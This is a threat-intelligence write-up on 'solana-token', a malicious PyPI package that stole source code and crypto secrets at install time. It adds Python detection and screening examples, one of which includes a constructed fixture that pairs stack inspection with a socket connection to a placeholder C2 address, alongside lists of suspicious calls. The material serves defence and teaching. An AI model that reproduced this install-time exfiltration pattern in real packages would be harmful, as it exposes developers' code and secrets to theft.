Full Report
Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that purports to be an application related to the Solana blockchain, but contains malicious functionality to steal source code and developer secrets. The package, named solana-token, is no longer available for download from PyPI, but not before it was downloaded 761 times. It was first
Analysis Summary
# Tool/Technique: solana-token PyPI Package
## Overview
A malicious package published to the Python Package Index (PyPI) repository, disguised as a legitimate Solana blockchain tool (`solana-token`). It was intended to lure developers working on Solana-related projects into installing it, after which it stole source code, together with any developer secrets embedded in that code, from the affected system.
## Technical Details
- Type: Malware (Supply Chain Compromise)
- Platform: Python environments, likely targeting developers using Linux/Unix-like systems where Python is prevalent.
- Capabilities: Source code exfiltration, theft of developer secrets, communication with a hardcoded Command and Control (C2) server.
- First Seen: early April 2024 (first published version); analysis reported May 13, 2025.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1195 - Supply Chain Compromise
- T1195.002 - Compromise Software Supply Chain
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Impersonation:** Poses as a legitimate Solana application package named `solana-token`.
- **Payload Execution:** Executes malicious code upon installation.
- **Data Staging:** Reads and copies the source code of every file on the Python execution (call) stack at the time its trigger runs.
- **Exfiltration Trigger:** The exfiltration logic is hidden inside a function named `register_node()` that masquerades as a blockchain operation.
### Advanced Features
- **Secret Harvesting:** Specifically designed to steal hard-coded crypto-related secrets found within the source code being exfiltrated.
- **Hardcoded C2:** Exfiltrates stolen data directly to a pre-determined IP address.
## Indicators of Compromise
- File Hashes: [N/A - Not publicly disclosed in context]
- File Names: `solana-token` (Package name)
- Registry Keys: [N/A]
- Network Indicators: a hard-coded C2 IP address; the address itself is not disclosed in the source, so `[Hardcoded_C2_IP_Address]` stands in as a placeholder.
- Behavioral Indicators: code execution during package installation that the package's stated purpose does not explain; attempts to read or copy large numbers of source files; outbound connections from the package's execution context to an unusual IP address.
## Associated Threat Actors
- Unknown threat actors specializing in supply chain attacks targeting the cryptocurrency development ecosystem (specifically Solana developers).
## Detection Methods
- Signature-based detection: rules that match strings or code patterns unique to the `solana-token` package structure.
- Behavioral detection: monitoring file-system access during package installation for bulk reading or copying of files that normal package setup would never touch, and monitoring for outbound connections made by the installer process.
- YARA rules: can be written for strings unique to this package, such as the `register_node` function name or the embedded C2 address, and matched against package archives before installation.
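The behavioral indicators and the behavioral detection method above describe one correlation: an installer process (and anything it spawns) reading files outside the package build tree while also talking to something other than the package index. The following is an added example, not code from the original report or from any product, that applies that correlation to a constructed JSON-lines event log. The log format, the `dst_host`/`dst_ip` fields, the allowed index hosts and the expected-path prefixes are all assumptions made for the example; a real deployment would map them onto its own EDR or auditd output.

```python
import json

# Package indexes a pip process is expected to talk to (assumption for this
# example). A connection with no resolved hostname, or to any other host, is
# flagged.
ALLOWED_INDEX_HOSTS = ("pypi.org", "files.pythonhosted.org")

# Paths a build/install step legitimately touches (assumption). Reads outside
# these prefixes, e.g. the developer's own project tree, are not part of
# normal package setup.
EXPECTED_PATH_PREFIXES = (
    "/tmp/pip-", "/usr/lib/python", "/usr/local/lib/python",
    "/home/dev/.cache/pip", "/home/dev/venv/",
)


def build_process_tree(events):
    """Map each exec'd pid to its parent and command line."""
    parent, cmd = {}, {}
    for ev in events:
        if ev["event"] == "exec":
            parent[ev["pid"]] = ev["ppid"]
            cmd[ev["pid"]] = ev["cmd"]
    return parent, cmd


def install_root(pid, parent, cmd):
    """Walk up the tree to the `pip install` process that owns pid, or None."""
    seen = set()
    while pid in parent and pid not in seen:
        seen.add(pid)
        if cmd.get(pid, "").startswith("pip install"):
            return pid
        pid = parent[pid]
    return None


def is_expected_path(path):
    return path.startswith(EXPECTED_PATH_PREFIXES)


def is_expected_connect(ev):
    host = ev.get("dst_host")
    return bool(host) and host.endswith(ALLOWED_INDEX_HOSTS)


def detect_install_time_exfil(log_lines):
    """Return one alert per pip install tree that both read unexpected files
    and connected somewhere other than the package index."""
    events = [json.loads(line) for line in log_lines if line.strip()]
    parent, cmd = build_process_tree(events)
    alerts = {}
    for ev in events:
        root = install_root(ev["pid"], parent, cmd)
        if root is None:
            continue  # not part of any pip install tree
        alert = alerts.setdefault(root, {
            "root_pid": root, "cmd": cmd[root],
            "unexpected_reads": [], "unexpected_connects": [],
        })
        if ev["event"] == "open" and not is_expected_path(ev["path"]):
            alert["unexpected_reads"].append(ev["path"])
        elif ev["event"] == "connect" and not is_expected_connect(ev):
            alert["unexpected_connects"].append(f'{ev["dst_ip"]}:{ev["dst_port"]}')
    # Require both behaviours together to keep noise down.
    return [a for a in alerts.values()
            if a["unexpected_reads"] and a["unexpected_connects"]]


# Constructed sample log: one install that shows both behaviours, one benign
# install, and an unrelated editor process touching the same source file.
SAMPLE_LOG = '''\
{"ts": "2025-05-13T10:00:01Z", "event": "exec", "pid": 4211, "ppid": 4200, "cmd": "pip install solana-token"}
{"ts": "2025-05-13T10:00:02Z", "event": "connect", "pid": 4211, "dst_host": "files.pythonhosted.org", "dst_ip": "198.51.100.5", "dst_port": 443}
{"ts": "2025-05-13T10:00:03Z", "event": "exec", "pid": 4212, "ppid": 4211, "cmd": "python setup.py install"}
{"ts": "2025-05-13T10:00:03Z", "event": "open", "pid": 4212, "path": "/tmp/pip-build-k3x/setup.py"}
{"ts": "2025-05-13T10:00:04Z", "event": "open", "pid": 4212, "path": "/home/dev/project/app/wallet.py"}
{"ts": "2025-05-13T10:00:04Z", "event": "open", "pid": 4212, "path": "/home/dev/project/app/config.py"}
{"ts": "2025-05-13T10:00:05Z", "event": "connect", "pid": 4212, "dst_host": null, "dst_ip": "203.0.113.10", "dst_port": 8080}
{"ts": "2025-05-13T10:05:00Z", "event": "exec", "pid": 5000, "ppid": 4200, "cmd": "pip install requests"}
{"ts": "2025-05-13T10:05:01Z", "event": "connect", "pid": 5000, "dst_host": "files.pythonhosted.org", "dst_ip": "198.51.100.5", "dst_port": 443}
{"ts": "2025-05-13T10:05:02Z", "event": "open", "pid": 5000, "path": "/home/dev/.cache/pip/wheels/requests.whl"}
{"ts": "2025-05-13T10:06:00Z", "event": "exec", "pid": 4300, "ppid": 4200, "cmd": "vim app/wallet.py"}
{"ts": "2025-05-13T10:06:01Z", "event": "open", "pid": 4300, "path": "/home/dev/project/app/wallet.py"}
'''

if __name__ == "__main__":
    for alert in detect_install_time_exfil(SAMPLE_LOG.splitlines()):
        print(json.dumps(alert, indent=2))
```

Only the `solana-token` install tree is reported: the editor process reads the same `wallet.py` but is not under a `pip install`, and the `requests` install only talks to the index and reads from the pip cache. Requiring both behaviours in the same tree is what keeps a build step that merely fetches a dependency from paging anyone.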
## Mitigation Strategies
- Prevention measures: Aggressively monitor and vet all third-party software modules, especially packages downloaded from public repositories like PyPI, before integration into development environments.
- Hardening recommendations: Implement least privilege principles within development environments; use dependency scanning tools to check for known malicious packages; avoid using packages with suspicious versioning schemes or recently published code for critical projects.
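The signature-based detection method and the prevention measure above both come down to looking at a package before it runs: an installer script that imports networking modules, inspects the call stack, walks the file system or carries a raw IP literal deserves a human read before `pip install`. The following is an added example, not code from the original report or from any real scanner, that performs that pre-install screening of a `setup.py` with Python's `ast` module. The two fixtures are constructed for the example; the suspicious one only carries the traits the report describes (stack introspection, a socket call, a hard-coded IP, a function named `register_node`) and is not the real package's code. The IP `203.0.113.10` is a documentation address.

```python
import ast
import re
import sys

# Modules and calls that have no business in an installer script: networking,
# call-stack introspection, bulk file-system traversal and dynamic code loading.
# Any hit is a reason to read the file by hand before installing the package.
SUSPICIOUS_IMPORTS = {"socket", "urllib", "urllib.request", "http.client", "requests"}
SUSPICIOUS_CALLS = {
    "inspect.stack", "sys._getframe", "os.walk",
    "socket.socket", "socket.create_connection", "urllib.request.urlopen",
    "requests.get", "requests.post", "subprocess.run", "subprocess.Popen",
    "exec", "eval",
}
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
# Function name the report associates with this package's exfiltration trigger.
KNOWN_TRIGGER_NAMES = {"register_node"}


def _dotted_name(node):
    """Return 'a.b.c' for an Attribute/Name chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def screen_setup_source(source):
    """Statically screen the text of a setup.py; return (line, message) findings sorted by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_IMPORTS:
                    findings.append((node.lineno, f"imports {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            if node.module in SUSPICIOUS_IMPORTS:
                findings.append((node.lineno, f"imports from {node.module}"))
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"calls {name}()"))
        elif isinstance(node, ast.FunctionDef) and node.name in KNOWN_TRIGGER_NAMES:
            findings.append((node.lineno, f"defines known trigger name {node.name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IPV4_RE.match(node.value):
                findings.append((node.lineno, f"hard-coded IPv4 literal {node.value}"))
    return sorted(findings)


# Constructed fixtures: a benign setup.py and one that shows the install-time
# traits described in the report. Neither is the real package's code.
BENIGN_SETUP = '''\
from setuptools import setup, find_packages

setup(
    name="example-token",
    version="0.1",
    packages=find_packages(),
)
'''

SUSPICIOUS_SETUP = '''\
import inspect, socket
from setuptools import setup

C2 = "203.0.113.10"

def register_node():
    frames = inspect.stack()
    return socket.create_connection((C2, 8080))

setup(name="example-token", version="0.1")
'''

if __name__ == "__main__":
    # Usage: python screen_setup.py path/to/setup.py   (no argument: run the fixtures)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            samples = {sys.argv[1]: fh.read()}
    else:
        samples = {"benign": BENIGN_SETUP, "suspicious": SUSPICIOUS_SETUP}
    for label, src in samples.items():
        hits = screen_setup_source(src)
        print(f"{label}: {'clean' if not hits else ''}")
        for line, msg in hits:
            print(f"  line {line}: {msg}")
```

Run it against the `setup.py` of a downloaded sdist (`pip download --no-binary :all: <pkg>` gives you the archive without executing it) and treat any finding as a stop-and-read, not a verdict: a legitimate build script can use `subprocess`, but it should be obvious from context why. The screening is static on purpose, since executing `setup.py` to observe it is exactly what the attack relies on.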
## Related Tools/Techniques
- General PyPI/NPM/Gem Supply Chain Compromises.
- Tools designed for credential and source code theft delivered via compromised libraries.